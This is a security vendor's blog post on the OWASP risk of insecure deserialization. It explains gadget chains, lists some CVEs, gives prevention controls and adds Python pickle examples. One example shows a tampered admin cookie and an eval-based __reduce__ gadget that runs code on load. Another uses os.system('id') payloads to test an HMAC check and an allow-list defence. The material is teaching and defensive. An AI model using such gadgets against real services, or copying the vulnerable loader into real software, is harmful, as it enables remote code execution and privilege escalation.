OWASP Top 10 : Insecure Deserialization

The Open Web Application Security Project, or OWASP, is an international non-profit organization dedicated to Web Application Security. The OWASP Top 10 is a standard awareness document representing a broad consensus about the top 10 critical security risks to web applications. Learn more about OWASP Top 10 through this series of short blog posts.




What is Insecure Deserialization?


Serialization converts an object and its state into a byte stream (or a text format such as JSON or XML) so it can be stored or sent over a network. Deserialization rebuilds the object and its state from that stream. The problem arises when an application deserializes data it does not control: the deserializer reconstructs whatever object graph the bytes describe, and most native formats invoke class-specific hooks while doing so (Java readObject, Python __reduce__, PHP __wakeup, .NET type resolution). An attacker who can modify the serialized data can therefore change application state that the server assumed was trustworthy, or chain classes that already exist in the application ("gadgets") into code execution. This weakness is catalogued as CWE-502, Deserialization of Untrusted Data. Depending on the language, deserialization is also called unpickling (Python) or unmarshalling (Java, Ruby).
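How a tampered stream turns into code execution, as an added example that is not part of the original post. It uses Python's pickle module; the SessionToken cookie, the vulnerable server_load_session function and the attacker's ExecGadget class are all constructed here for illustration.

```python
import os
import pickle
import pickletools


class SessionToken:
    """Object the hypothetical application serializes into a client-side cookie."""

    def __init__(self, user, role):
        self.user = user
        self.role = role


def server_load_session(cookie_bytes):
    """Vulnerable: rebuilds whatever object graph the client-supplied bytes describe."""
    return pickle.loads(cookie_bytes)


def legitimate_cookie():
    return pickle.dumps(SessionToken("alice", "user"))


def tampered_cookie():
    """Integrity attack without code execution: the client owns the cookie, so it can
    decode it, change the role field and re-encode it; the server cannot tell."""
    token = pickle.loads(legitimate_cookie())
    token.role = "admin"
    return pickle.dumps(token)


class ExecGadget:
    """Attacker-side class (constructed for this example). __reduce__ tells pickle to
    record this object as 'call builtins.eval(expr)'. The victim never needs
    ExecGadget itself: the stream only references builtins.eval, which every
    Python process has."""

    def __init__(self, expr):
        self.expr = expr

    def __reduce__(self):
        return (eval, (self.expr,))


def rce_cookie(expr="__import__('os').getpid()"):
    """Cookie that makes the server evaluate attacker-chosen Python on load.
    The default expression is harmless but observable: it returns the victim's PID."""
    return pickle.dumps(ExecGadget(expr))


def victim_ran_attacker_code():
    """pickle.loads returns eval's result, which was computed inside the server."""
    return server_load_session(rce_cookie()) == os.getpid()


def opcodes(payload):
    """Opcode names in a stream, so a payload can be triaged without executing it.
    GLOBAL/STACK_GLOBAL followed by REDUCE means 'look up a callable and call it'."""
    return [op.name for op, _arg, _pos in pickletools.genops(payload)]


if __name__ == "__main__":
    print(server_load_session(tampered_cookie()).role)   # admin
    print(victim_ran_attacker_code())                     # True
    print(opcodes(rce_cookie()))
```

Dumping the opcodes (or running `python -m pickletools` on a captured payload) is the safe way to inspect a suspicious stream during incident response: a GLOBAL that resolves to something like os.system or builtins.eval followed by REDUCE is the signature of a gadget, and it is visible without ever calling pickle.loads. The same shape applies to Java ObjectInputStream (readObject hooks) and PHP unserialize (__wakeup/__destruct): the format lets the data decide which code runs.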


How do insecure deserialization attacks impact business?


Integrity loss: an attacker who modifies a serialized object can change application state or logic that the server assumed was trustworthy, and in the worst case achieve remote code execution. Availability loss: crafted payloads that are expensive to reconstruct (deeply nested or self-referencing object graphs) can exhaust CPU or memory and cause denial of service. Confidentiality loss: deserialization gadgets can read arbitrary files, disclose data, or escalate privileges.


Some products where insecure deserialization was identified

  • CVE-2020-2883 in Oracle WebLogic Server. An unauthenticated attacker with network access to the server's IIOP or T3 listener could send a malicious serialized object and take over the WebLogic server.

  • CVE-2020-14000 in the MIT Lifelong Kindergarten Scratch VM (scratch-vm). Loading an untrusted project .json file could result in remote code execution.

  • CVE-2019-19395, reported in Telerik UI for ASP.NET AJAX, a component library used to build forms in ASP.NET AJAX applications.

  • In 2018, many deserialization attacks seen in the wild were aimed at cryptomining: attackers sent tampered serialized payloads to vulnerable web applications, which deserialized them and ended up running miners on the server.

  • CVE-2017-9424 in IdeaBlade Breeze.Server.NET. JSON deserialization was performed with Json.NET's TypeNameHandling enabled, so a type name embedded in attacker-supplied JSON controlled which .NET type was instantiated, allowing remote code execution.

How to prevent an insecure deserialization attack?

  • Sign serialized objects (an HMAC or a digital signature over the serialized bytes) and verify the signature before deserializing, so tampered or forged data is rejected without ever being parsed

  • Run deserialization code in an isolated, low-privilege environment (separate process, container or sandbox) so that a successful gadget chain gains as little as possible

  • Do not deserialize untrusted data whenever possible. If it is unavoidable, restrict what the deserializer may instantiate (an allow-list of expected classes, no type names taken from the data) and consider runtime application self-protection (RASP) as an additional layer

  • Monitor and alert when a user or client deserializes far more often than normal

  • Log deserialization exceptions and failures; a burst of rejected or malformed objects is often the first sign of an attacker probing gadget chains

  • Monitor incoming and outgoing network traffic from containers or servers where deserialization occurs

  • Follow OWASP's guidance on deserializing objects safely (the OWASP Deserialization Cheat Sheet)
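The first and third controls above (sign the serialized bytes and verify before deserializing; constrain what the deserializer may instantiate) applied to a pickled session object, as an added example that is not part of the original post. SECRET_KEY, SessionToken, RestrictedUnpickler and the attacker's ExecGadget are constructed here for illustration; the isolation control is not shown.

```python
import hashlib
import hmac
import io
import os
import pickle

SECRET_KEY = os.urandom(32)   # illustrative; a real service loads this from a secret store
TAG_LEN = 32                  # SHA-256 output length


class SessionToken:
    """The only object type the hypothetical server expects to receive."""

    def __init__(self, user, role):
        self.user = user
        self.role = role


class ExecGadget:
    """Attacker payload (constructed for this example): pickle records it as
    'call builtins.eval(expr)'."""

    def __init__(self, expr):
        self.expr = expr

    def __reduce__(self):
        return (eval, (self.expr,))


def seal(obj) -> bytes:
    """Control 1: serialize, then prepend HMAC-SHA256(key, data). The tag covers the
    exact bytes that will later be fed to the deserializer."""
    data = pickle.dumps(obj)
    return hmac.new(SECRET_KEY, data, hashlib.sha256).digest() + data


class RestrictedUnpickler(pickle.Unpickler):
    """Control 2: every class referenced by the stream passes through find_class;
    anything not on the allow-list (including builtins.eval) is refused."""

    ALLOWED = {(SessionToken.__module__, "SessionToken")}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"forbidden global {module}.{name}")
        return super().find_class(module, name)


def open_sealed(blob: bytes):
    """Verify the tag in constant time first; only then let the restricted
    unpickler touch the data."""
    if len(blob) < TAG_LEN:
        raise ValueError("blob too short to carry a tag")
    tag, data = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: refusing to deserialize")
    return RestrictedUnpickler(io.BytesIO(data)).load()


def outcome(blob: bytes) -> str:
    """Classify what the server does with a blob (used by demo)."""
    try:
        obj = open_sealed(blob)
    except ValueError as e:
        return f"rejected by HMAC: {e}"
    except pickle.UnpicklingError as e:
        return f"rejected by allow-list: {e}"
    return f"accepted: {obj.user}/{obj.role}"


def demo():
    good = seal(SessionToken("alice", "user"))
    # Attack 1: the client edits the data (role "user" -> "root") but cannot re-sign it.
    tampered = good[:TAG_LEN] + good[TAG_LEN:].replace(b"user", b"root")
    # Attack 2: a forged gadget chain with a made-up tag.
    forged = b"\x00" * TAG_LEN + pickle.dumps(ExecGadget("__import__('os').system('id')"))
    # Attack 3: the key leaked (or a developer skipped verification); the allow-list
    # still stops builtins.eval from being resolved.
    key_leaked = seal(ExecGadget("__import__('os').system('id')"))
    return {
        "legitimate": outcome(good),
        "tampered": outcome(tampered),
        "forged": outcome(forged),
        "key_leaked": outcome(key_leaked),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:11s} {result}")
```

The order in open_sealed matters: the MAC is checked before a single opcode is processed, so a gadget chain is never reconstructed, and hmac.compare_digest avoids leaking the tag byte by byte through timing. The allow-list is defense in depth for the day the key leaks or someone calls pickle.loads directly; it is not a substitute for the signature, because an allow-listed class can still be rebuilt with attacker-chosen field values. Where the data only needs to carry fields rather than behaviour, a data-only format (JSON parsed into explicitly constructed objects, with no type names taken from the input) removes the gadget problem entirely and is the option OWASP recommends first.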


Interested in learning how to know if your organization is vulnerable to insecure deserialization attacks? Drop us a note now at sales@siemba.io